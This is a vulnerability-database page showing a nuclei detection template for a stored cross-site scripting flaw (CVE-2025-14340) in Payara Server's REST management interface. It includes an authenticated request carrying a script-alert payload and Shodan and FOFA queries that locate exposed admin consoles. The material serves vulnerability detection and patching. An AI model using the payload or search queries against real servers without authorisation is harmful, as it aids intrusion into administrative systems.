Lucene search
K

Payara Server - Cross-Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

Payara Server stored XSS in REST Management Interface misleads admins into changing admin password.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-14340
10 Apr 202621:03
circl
CNNVD
Payara Server 安全漏洞
18 Feb 202600:00
cnnvd
CVE
CVE-2025-14340
18 Feb 202613:39
cve
Cvelist
CVE-2025-14340 Admin Account Takeover via malicious URL payload
18 Feb 202613:39
cvelist
NVD
CVE-2025-14340
18 Feb 202614:16
nvd
Packet Storm
📄 Payara Server Cross Site Scripting
24 Mar 202600:00
packetstorm
Positive Technologies
PT-2026-20388
18 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2025-14340
19 Feb 202619:21
redhatcve
Snyk
Cross-site Scripting (XSS)
18 Feb 202615:05
snyk
Snyk
Cross-site Scripting (XSS)
18 Feb 202615:05
snyk
Rows per page
id: CVE-2025-14340

info:
  name: Payara Server - Cross-Site Scripting
  author: 0x_Akoko,0xr2r
  severity: high
  description: |
   Payara Server versions <4.1.2.191.54, <5.83.0, <6.34.0, and <7.2026.1 contain a stored XSS vulnerability caused by improper input sanitization in the REST Management Interface. This allows attackers to mislead administrators into changing the admin password via a URL payload; however, the exploit requires administrator interaction.
  impact: |
   Attackers can trick administrators into changing the admin password, potentially leading to full administrative control.
  remediation: |
   Update to version 4.1.2.191.54, 5.83.0, 6.34.0, 7.2026.1 or later.
  reference:
    - https://github.com/DeepSecurityResearch/CVE-2025-14340
    - https://www.payara.fish
    - https://nvd.nist.gov/vuln/detail/CVE-2025-14340
  classification:
    cve-id: CVE-2025-14340
    epss-score: 0.01002
    epss-percentile: 0.58703
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cwe-id: CWE-79
  metadata:
    max-request: 2
    verified: true
    shodan-query: http.title:"Payara Server" port:4848
    fofa-query: title="Payara Server" && port="4848"
  tags: cve,cve2025,payara,xss,glassfish,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /common/index.jsf HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Payara Foundation", "Payara")'
          - 'contains(header, "badassfish")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /management/domain/version?%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ":" + password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'badassfish'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 500
# digest: 4a0a00473045022100f8c94116b006c0c40c8a752f9ee20c274f79feb22d372a54218012d8f4bcddeb0220137aa05245f2a374bb6a8ca9f3019a3ce611aaad30c36dda6e3aa331374cad0d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Apr 2026 12:18Current
5.9Medium risk
Vulners AI Score5.9
CVSS 49.3
EPSS0.01002
SSVC
6